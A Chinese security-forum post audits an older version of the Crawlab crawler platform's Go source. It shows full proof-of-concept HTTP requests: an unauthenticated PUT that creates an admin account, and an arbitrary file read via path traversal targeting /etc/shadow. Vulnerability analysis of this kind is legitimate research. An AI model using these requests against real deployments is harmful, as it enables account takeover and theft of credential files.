问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Goland 代码审计: GitHub 开源项目 Crawlab
漏洞分析
Goland 代码审计: GitHub 开源项目 Crawlab
Goland 代码审计: GitHub 开源项目 Crawlab ================================ 前言 -- 在GitHub上找到了一个爬虫项目来进行代码审计漏洞挖掘,官方在去年12月重构了代码并转移到了Github,与此同时也修复了曾经出现的漏洞,这里主要分享一下重构前的版本 代码的漏洞分析思路 ` 最新版本已不受影响 https://github.com/crawlab-team/crawlab ` data:image/s3,"s3://crabby-images/ae74a/ae74a5fff4d4741d26ec7833b9012aa738ba0fbc" alt="" data:image/s3,"s3://crabby-images/0496c/0496c4f9ff42ce589972a6577b2de5c7ed4e52e2" alt="" 功能了解 ---- 由于是开源项目,我们可以首先通过在本地进行搭建来了解功能 data:image/s3,"s3://crabby-images/6fcaf/6fcaffdc98d094726bbb2af949ec9657c4fbf494" alt="" 找到对应的路由文件 backend/main.go data:image/s3,"s3://crabby-images/69bf7/69bf7b240fcf8c52235b7a946d95162e6e131c22" alt="" 可以看到两种不同的分组 ` anonymousGroup 和 authGroup ` data:image/s3,"s3://crabby-images/1be90/1be9083e618d88212ea7ea5e40e2e880aba22524" alt="" 跟踪一下 AuthorizationMiddleware方法 data:image/s3,"s3://crabby-images/a65dd/a65dd1069e9982e0f6f6507487c0f865bbd03f9e" alt="" 这里可以看到方法为权限验证的方法,其下的方法都需要通过身份验证才可以调用,我们如果想要找到前台的漏洞,就需要查看匿名可调用的方法 data:image/s3,"s3://crabby-images/a74af/a74aff5b3970d3f4763477a38077e37c8c97c1fb" alt="" 漏洞挖掘 ---- data:image/s3,"s3://crabby-images/9c493/9c4937d5d21cff8b8a67e6bb0fbdf56f1535ecd9" alt="" 在匿名可调用的方法里存在了一个在验证身份后才可调用的方法 PutUser,跟踪该方法 data:image/s3,"s3://crabby-images/ac65a/ac65a65635097a6191336e19354aae74a669e198" alt="" ```php // @Summary Put user // @Description Put user // @Tags user // @Produce json // @Param Authorization header string true "Authorization token" // @Param reqData body routes.UserRequestData true "reqData body" // @Success 200 json string Response // @Failure 400 json string Response // @Router /users [put] func PutUser(c *gin.Context) { // 绑定请求数据 var reqData UserRequestData if err := c.ShouldBindJSON(&reqData); err != nil { HandleError(http.StatusBadRequest, c, err) return } // 默认为正常用户 if reqData.Role == "" { reqData.Role = constants.RoleNormal } // UserId uid := services.GetCurrentUserId(c) // 空 UserId 处理 if uid == "" { uid = bson.ObjectIdHex(constants.ObjectIdNull) } // 添加用户 if err := services.CreateNewUser(reqData.Username, reqData.Password, reqData.Role, reqData.Email, uid); err != nil { HandleError(http.StatusInternalServerError, c, err) return } c.JSON(http.StatusOK, Response{ Status: "ok", Message: "success", }) } ``` 查看 CreateNewUser 方法调用所需要的字段 data:image/s3,"s3://crabby-images/50fe7/50fe756986ff0790051a9ccaa4f8044e2a9574b0" alt="" ```php func CreateNewUser(username string, password string, role string, email string, uid bson.ObjectId) error { user := model.User{ Username: strings.ToLower(username), Password: utils.EncryptPassword(password), Role: role, Email: email, UserId: uid, Setting: model.UserSetting{ NotificationTrigger: constants.NotificationTriggerNever, EnabledNotifications: []string{ constants.NotificationTypeMail, constants.NotificationTypeDingTalk, constants.NotificationTypeWechat, }, }, } if err := user.Add(); err != nil { return err } return nil } ``` role参数 所对应的权限可以在 backend/constants/user.go 中找到 data:image/s3,"s3://crabby-images/b47f5/b47f55c6da03a09b8da35012219fd94231072eaf" alt="" 通过发送 PUT请求 和对应的字段调用方法添加用户获取后台权限 ```php PUT /api/users HTTP/1.1 Host: Content-Length: 83 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: Hm_lvt_c35e3a563a06caee2524902c81975add=1639222117,1639278935; Hm_lpvt_c35e3a563a06caee2524902c81975add=1639278935 Connection: close {"username":"testppp","password":"testppp","role":"admin","email":"testppp@qq.com"} ``` data:image/s3,"s3://crabby-images/3aa4f/3aa4fbb6708daec5b638695591bdf430bc168b72" alt="" data:image/s3,"s3://crabby-images/e0478/e0478c43b7a12877de9566f0672a1312a2d6db6d" alt="" 成功添加用户,这样就获取到了后台管理员的权限了, 对有权限的接口方法进行漏洞挖掘 data:image/s3,"s3://crabby-images/19684/196843cdc49a667ec9626dcbfee8a2aa9ef26417" alt="" 找到一处获取文件的接口,跟踪一下方法 data:image/s3,"s3://crabby-images/81f73/81f73d73eee0770ca57a82626c9d8c3ef95691ee" alt="" path参数可控,没有进行文件读取的过滤 ```php package routes import ( "crawlab/utils" "github.com/gin-gonic/gin" "io/ioutil" "net/http" ) // @Summary Get file // @Description Get file // @Tags file // @Produce json // @Param Authorization header string true "Authorization token" // @Success 200 json string Response // @Failure 400 json string Response // @Router /file [get] func GetFile(c *gin.Context) { path := c.Query("path") fileBytes, err := ioutil.ReadFile(path) if err != nil { HandleError(http.StatusInternalServerError, c, err) } c.JSON(http.StatusOK, Response{ Status: "ok", Message: "success", Data: utils.BytesToString(fileBytes), }) } ``` 接口调用为后台才可调用,通过任意用户添加可以完成绕过 path参数可控,发送Get请求读取任意文件 ```php GET /api/file?path=../../etc/shadow HTTP/1.1 Host: Content-Length: 0 Accept: application/json, text/plain, */* Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjYwZGQxOWU0YmZjNzg3MDAxZDk1NjBjOSIsIm5iZiI6MTYzOTMwNTI2MiwidXNlcm5hbWUiOiJhZG1pbiJ9.mFRAwXN-QqTmFmPAxgFEJhVXwxVuxJMepHe4khADfgk User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: Hm_lvt_c35e3a563a06caee2524902c81975add=1639222117,1639278935; Hm_lpvt_c35e3a563a06caee2524902c81975add=1639278935 Connection: close ``` data:image/s3,"s3://crabby-images/99a00/99a005f5c7935e56baf35a90dc29f36ee44a8345" alt=""
发表于 2021-12-22 09:29:17
阅读 ( 9693 )
分类:
代码审计
1 推荐
收藏
0 条评论
请先
登录
后评论
PeiQi
5 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!